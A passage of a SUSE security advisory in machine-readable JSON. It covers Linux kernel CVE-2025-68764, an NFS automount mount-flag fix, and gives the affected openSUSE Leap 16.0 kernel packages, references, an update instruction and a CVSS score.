"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68743"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
